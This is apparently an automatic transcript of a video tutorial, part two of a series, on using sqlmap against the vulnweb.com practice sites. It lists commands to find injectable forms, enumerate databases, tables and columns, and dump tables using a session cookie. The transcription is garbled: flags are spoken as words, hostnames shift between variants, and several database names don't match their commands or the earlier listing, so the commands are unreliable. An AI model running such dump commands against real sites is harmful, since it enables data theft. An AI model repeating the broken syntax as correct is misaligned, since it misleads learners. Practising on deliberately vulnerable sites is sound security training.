Do you think you can hack this test website? In today's video, we're diving into more advanced SQL injection techniques using SQLmap. Stick around to see how it's done. This is part 2 of our deep dive into SQLmap. If you missed the first video, make sure to check it out. Last week, on the test website vulnweb.com, we tested the Accured website for SQL injection vulnerabilities. Today, we're going further to test Accuforum. We'll start with a basic test, a simple SQL injection to test for vulnerabilities. Let's kick things off by using SQLmap to scan the target website. We'll use the following command. SQLmap http://testsb.vulnweb.com batch forms. This command will scan the forms on the website to see if they are vulnerable to SQL injection. Now, let's take it up a notch. We want to list all databases on this target website. Here's the command we'll use. SQLmap http://testsb.vulnweb.com/showthread.asp?id=$0 dbs batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. This command specifies the URL, uses the DBS flag to list databases, and includes the cookie option to pass the session cookie for authentication. After running this, SQLmap reveals the following databases: Accuforum, Accuservice, Model, MSDB, and Temp. Now that we have our databases, let's explore the tables within each one. To do this, we use the tables flag. Let's start with the Accuforum database. Here's the command. For the Accuforum database, we will use this command. SQLmap http://testsb.vulnweb.com/showthread.asp?id=$0 d Accuforum tables batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. For the Accuservice database, we will use this command. SQLmap http://testsb.vulnweb.com/showthread.asp?id=$0 d Accuservice tables batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. For the model database, we will use this command. SQLmap http://testsb.vulnweb.com/showthread.asp?id=$0 d MSDB tables batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. For the temp database, we will use this command. SQLmap u http://testasp.vulnweb.com/showthread.asp?id equals $0 dtemp tables batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. As you can see, these commands allow us to identify the tables within each database. Now, let's move on to examining the columns inside these tables. For the users table in the SQLmap database, we will use this command. SQLmap u http://testasp.vulnweb.com/showthread.asp?id equals $0 d SQLmap t users columns batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. Now, let's extract data from specific tables. This is where we get to see the actual data stored in them. We'll use the dump flag. Here's how you do it for the users table in the SQLmap database. For the users table in the SQLmap database, we will use this command. SQLmap u http://testasp.vulnweb.com/showthread.asp?id equals $0 d SQLmap t users dump batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. For the employees table in the SQLservice database, we will use this command. SQLmap u http://testasp.vulnweb.com/showthread.asp?id equals $0 d SQLservice t employees dump batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. For the products table in the model database, we will use this command. SQLmap u http://testasp.vulnweb.com/showthread.asp?id equals $0 d model t products dump batch cookie equals aspssaonidsrbddrc equals gckakgdbjk jeffable. For the jobs table in the MSDB database, we will use this command. SQLmap u http://testsp.vulnweb.com/showthread.asp?id =$0 dmsdbt jobs dump batch cookie equals aspsssao1idsrbtgrc equals gckakgdbjk jeffable. For the temp underscore table in the temp database, we will use this command. SQLmap u http://testsp.vulnweb.com/showthread.asp?id $0 temp underscore table dump batch cookie equals aspsssao1idsrbtgrc equals gckakgdbjk jeffable. And there you have it. With these commands, you can extract data from various tables across different databases. That wraps up part 2 of our SQL injection series using SQLmap. Today, we've scanned for vulnerabilities, listed databases and tables, explored columns, and even dumped data. In the next video, we'll dive into even more advanced techniques, so make sure you don't miss it. If you found this tutorial helpful, hit the like button, subscribe, and ring the bell for notifications.